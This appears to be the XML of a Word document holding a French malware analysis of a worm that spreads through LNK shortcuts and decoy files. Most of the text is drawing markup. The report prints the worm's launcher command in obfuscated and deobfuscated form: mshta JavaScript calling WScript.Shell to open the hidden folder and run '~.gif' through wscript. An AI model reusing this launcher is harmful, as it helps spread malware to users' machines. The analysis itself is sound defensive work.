            <wp:docPr id="1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44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Ouvrent le dossier caché légitime dans l’explorateur Windows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478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4899925</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1716182" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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618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Exécutent le ver </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="53"/>
                          </w:rPr>
                          <w:t xml:space="preserve">~.gif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5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5172098</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3636744" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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67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 commande intégrée à ces fichiers LNK est la suivante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6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5458112</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1407612" cy="143867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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7612" cy="1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6" w:lineRule="exact"/>
                          <w:ind/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle40"/>
                            <w:spacing w:val="-1"/>
                          </w:rPr>
                          <w:t xml:space="preserve"># Original command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7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5610601</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3680764" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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076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"javascript:eval('function f(x){return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8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5757921</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5763057" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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3057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x.split(\"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").reverse().join(\"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");};s=f(\"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle32"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">nur\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");y=f(\"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llehS.tpircSW\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");w=ne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9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5905241</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5763184" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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318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w ActiveXObject(y);window[\"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w\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"][s](\"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explorer [</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle47"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">FOLDER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_</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle47"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">PATH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]\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");window[\"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w\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0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6052561</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4647743" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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7743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7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">[s](\"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wscript.exe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~.gif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//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b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//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e:vbScript \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");window.close()')"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1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6347201</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1672133" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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2133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# Deobfuscated version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2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6494521</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2044243" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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4243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mshta.exe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"javascript:eval(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4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6641841</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3978834" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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883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var shellObject = new ActiveXObject("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WScript.Shell</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle46"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">");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5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6789161</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3159684" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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968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shellObject.Run("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explorer [</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle47"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">FOLDER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_</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle47"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">PATH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]</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle46"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">");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6936481</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4052494" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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249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shellObject.Run("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wscript.exe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~.gif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//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b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//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e:vbScript</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle46"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">");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7083801</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1151560" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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1560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window.close();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8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7231121</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="184709" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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709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)"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7816238</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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Deuxièmement, le module utilise une logique basée sur le contenu du répertoire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0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7989593</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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générer un deuxième type de raccourci LNK. Si le répertoire actuel contient moins de quatre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1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8162948</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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éléments, il génère des fichiers LNK leurres. Contrairement au fichier L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NK précédent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, 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2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8353690</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5834898" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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fichiers leurres renvoient directement vers la charge utile </w:t>
                        </w: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 via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wscript.exe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. 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3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8551568</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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processus d’infection est récursif et s’étend aux sous-répertoires jusqu’à une profondeur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4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8724923</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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codée en dur de quatre sous-dossiers. À mesure que le module explore le disque, il continue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5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8895345</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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à répliquer la charge utile </w:t>
                        </w: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dans chaque répertoire qu’il visite. Cependant, aucun faux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6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9077983</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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dossier LNK n’est créé pour ces sous-répertoires ; les dossiers restent visibles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7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9251338</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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l’utilisateur, mais la génération de leurres sous forme de simples fichiers LNK exécutant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8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9421760</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1488170" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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817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ver </w:t>
                        </w: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~.gif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reste active.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7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038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7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14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7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243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7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345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7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96857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3671569"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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671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671569">
                          <a:moveTo>
                            <a:pt x="0" y="3392804"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3392804"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3671569"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3671569"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3392804"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2298699"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2298699"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3393440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3393440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2298699"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1165859"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1165859"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2298699"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2298699"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1165859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1165859"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="116585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3696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4775844</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5875019" cy="922020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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922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922020">
                          <a:moveTo>
                            <a:pt x="0" y="755015"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5875019" y="755015"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5875019" y="922020"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="922020"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="755015"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="608330"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="608330"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="755650"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="755650"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="608330"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="313689"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="313689"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="608330"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="608330"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="313689"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="166370"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="166370"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="313689"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="313689"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="166370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66370"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="16637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5697864</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="3338830"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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338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338830">
                          <a:moveTo>
                            <a:pt x="0" y="2336164"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2336164"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3338830"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3338830"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2336164"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2022474"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2022474"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2336800"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2336800"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2022474"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1744345"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1744345"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2023109"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2023109"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1744345"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="904239"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="904239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1744980"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1744980"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="904239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904239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="90423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8496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3671569"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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671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671569">
                          <a:moveTo>
                            <a:pt x="0" y="3392804"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3392804"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3671569"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3671569"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3392804"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2298699"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2298699"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3393440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3393440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2298699"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1165859"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1165859"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2298699"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2298699"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1165859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1165859"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="116585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0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4775844</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5875019" cy="922020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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922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922020">
                          <a:moveTo>
                            <a:pt x="0" y="755015"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5875019" y="755015"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5875019" y="922020"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="922020"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="755015"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="608330"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="608330"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="755650"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="755650"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="608330"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="313689"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="313689"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="608330"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="608330"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="313689"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="166370"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="166370"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="313689"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="313689"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="166370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66370"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="16637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62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5697864</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="3338830"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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338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338830">
                          <a:moveTo>
                            <a:pt x="0" y="2336164"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2336164"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3338830"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3338830"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2336164"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2022474"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2022474"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2336800"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2336800"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2022474"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1744345"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1744345"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2023109"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2023109"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1744345"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="904239"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="904239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1744980"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1744980"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="904239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904239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="90423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772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9289424</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1828800" cy="6349"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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9776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4776479</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="165735"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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7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735">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="16573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0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4776479</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="165735"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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7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735">
                          <a:moveTo>
                            <a:pt x="0" y="16573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1824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4942214</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="147319"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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19">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="14731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2848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4942214</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="147319"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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19">
                          <a:moveTo>
                            <a:pt x="0" y="14731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3872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5089534</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="294640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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946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94640">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="29464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4896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5089534</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="294640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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946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94640">
                          <a:moveTo>
                            <a:pt x="0" y="2946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5920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5384174</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="147319"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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19">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="14731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6944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5384174</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="147319"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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19">
                          <a:moveTo>
                            <a:pt x="0" y="14731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2304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4776479</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5874384" cy="921385"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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9213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921385">
                          <a:moveTo>
                            <a:pt x="3174" y="921385"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="755015"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="755015"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="921385"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="755015"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="607695"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="607695"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="755015"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="607695"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="313055"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="313055"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="607695"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="313055"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="165735"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="165735"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="313055"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="16573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165735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  <a:moveTo>
                            <a:pt x="3174" y="921385"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="755015"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="918210"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="918210"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="918210"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="918210"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="755015"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="92138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6400" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3550920</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2270769</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2246630" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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663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4663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2245995" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2245995" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="224663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049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2486669</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="773430" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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43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43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772795" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="772795" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="77343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8688" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5727700</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2486669</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="933449" cy="414020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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3449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3449" h="414020">
                          <a:moveTo>
                            <a:pt x="405764" y="414020"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="405764" y="214629"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="932814" y="214629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="932814" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="405129" y="215264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="933449" y="215264"/>
                          </a:lnTo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362584" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="362584" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="36321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278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2917199</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1558289" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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828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58289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557654" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1557654" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="155828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4832" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3683635</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3754129</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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6880" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>946784</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3754129</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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0" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3135630</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3968759</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1850390" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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039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0390" h="199389">
                          <a:moveTo>
                            <a:pt x="1849754" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1849754" y="199389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0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1736725" y="634"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1737359" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="185039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712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4184659</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="527049" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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04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04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526414" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="526414" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
